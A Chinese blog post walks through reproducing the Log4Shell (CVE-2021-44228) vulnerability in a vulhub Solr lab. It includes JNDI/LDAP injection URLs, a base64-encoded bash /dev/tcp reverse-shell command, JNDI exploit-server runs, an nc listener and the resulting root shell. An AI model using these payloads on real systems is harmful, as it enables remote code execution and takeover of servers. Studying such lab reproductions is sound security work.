log4j 复现

log4j 复现

背景知识

什么是 log4j

dnslog 平台

漏洞复现

环境:

  • 靶机 IP:192.1.1.128
  • 攻击机 IP:192.1.1.128
  • 中转机 IP:192.1.1.138

安装 vulhub

安装 docker 和 docker-compose 后即可开始使用 vulhub

1
2
sudo apt install docker.io
sudo apt install docker-compose

git 下载可以使用 git config --global https.proxy 'socks5://IP:Port' 来使用本地的代理端口,达到加速下载的目的

1
git clone https://github.com/vulhub/vulhub.git

docker 拉取镜像建议换成国内源

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<-'EOF'
{
    "registry-mirrors": [
        "https://docker.m.daocloud.io",
        "https://dockerproxy.com",
        "https://docker.mirrors.ustc.edu.cn",
        "https://docker.nju.edu.cn"
    ]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

# 测试拉取速度
docker pull wordpress

切换到漏洞目录下

1
cd vulhub-master/log4j/CVE-2021-44228

自动拉取镜像搭建漏洞环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/vulhub/log4j/CVE-2021-44228]
└─$ docker-compose up -d    
Pulling solr (vulhub/solr:8.11.0)...
8.11.0: Pulling from vulhub/solr
43c265008fae: Retrying in 1 second
43c265008fae: Pull complete
af36d2c7a148: Pull complete
2b7b4d10e1c1: Pull complete
f264389d8f2f: Pull complete
1a2c46e93f4a: Pull complete
f9506bb322c0: Pull complete
96f5dad14c2c: Pull complete
c387eff49cc3: Pull complete
Digest: sha256:84255b20a2d134fc97bbb0fab7cb826087098ee594fcbc94c3a71def24d31003
Status: Downloaded newer image for vulhub/solr:8.11.0
Creating cve-2021-44228_solr_1 ... done

使用 docker ps 命令查看访问端口,通过浏览器访问查看 web 服务是否正常

DNSLog 测试

首先使用 DNSLog 平台获取一个域名,然后通过 burp 抓包后,在参数中添加 payload,并进行 URL 编码。

构造 payload 的时候我们需要知道目标 URL,这个我们可以根据已有的博客或者官方的 API 文档得到

1
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://daoshad.dnslog.cn}

可以直接在浏览器中访问上述链接(替换为自己的路径和域名)

DNSLog.cn 中刷新得到了记录

之后在使用 JNDI 注入工具时,可能是版本问题,导致运行出现错误

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/tools]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE3Mi4xOC4wLjEvNjk2OSAwPiYxCg==}|{base64,-d}|{bash,-i}" -A 192.1.1.128
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.1.1.128
[COMMAND] >> bash -c  {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE3Mi4xOC4wLjEvNjk2OSAwPiYxCg==}|{base64,-d}|{bash,-i}
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.1.1.128:1099/vy06r4
ldap://192.1.1.128:1389/vy06r4
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.1.1.128:1099/jxriw9
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.1.1.128:1099/j4u6ro
ldap://192.1.1.128:1389/j4u6ro

----------------------------Server Log----------------------------
2023-07-27 06:40:31 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-07-27 06:40:32 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-07-27 06:40:32 [LDAPSERVER] >> Listening on 0.0.0.0:1389
2023-07-27 06:41:26 [RMISERVER]  >> Have connection from /172.18.0.2:41552
2023-07-27 06:41:26 [RMISERVER]  >> Reading message...
2023-07-27 06:41:26 [RMISERVER]  >> Is RMI.lookup call for vy06r4 2
2023-07-27 06:41:26 [RMISERVER]  >> Closing connection
Exception in thread "Thread-1" java.lang.IllegalAccessError: class jndi.RMIRefServer (in unnamed module @0x4015e7ec) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x4015e7ec
        at jndi.RMIRefServer.handleRMI(RMIRefServer.java:343)
        at jndi.RMIRefServer.doCall(RMIRefServer.java:299)
        at jndi.RMIRefServer.doMessage(RMIRefServer.java:245)
        at jndi.RMIRefServer.run(RMIRefServer.java:190)
        at java.base/java.lang.Thread.run(Thread.java:833)

选了另一台 Ubuntu 的机器作为中转机,安装 openjdk 1.8.0_362 版本

反弹 shell 测试

工具使用的是 zzwlpx/JNDIExploit: A malicious LDAP server for JNDI injection attacks (github.com) 环境如前所述,在中转机上 1.8 版本的 java 运行:

1
2
3
ubuntu@ubuntu:~/tools/Log4j-exp/poc$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.1.1.138
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...

攻击机上开启监听

1
2
3
4
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 6666
[sudo] password for kali: 
listening on [any] 6666 ...

接下来构造反弹 shell 的 payload

1
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.1.1.138:1389/Basic/ReverseShell/192.1.1.128/6666}

在浏览器中访问得到如下界面

再看监听,发现反弹成功

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 6666
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.1.1.128] from (UNKNOWN) [172.18.0.2] 60728
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@21f80351de19:/opt/solr/server#

参考

log4j-CVE-2021-44228-vulhub复现 (微信公众号乌鸦安全)

knowledge_database > vulhub
log4j 复现
https://i3eg1nner.github.io/2023/07/e185c3944248.html
作者
I3eg1nner
发布于
2023年7月27日
许可协议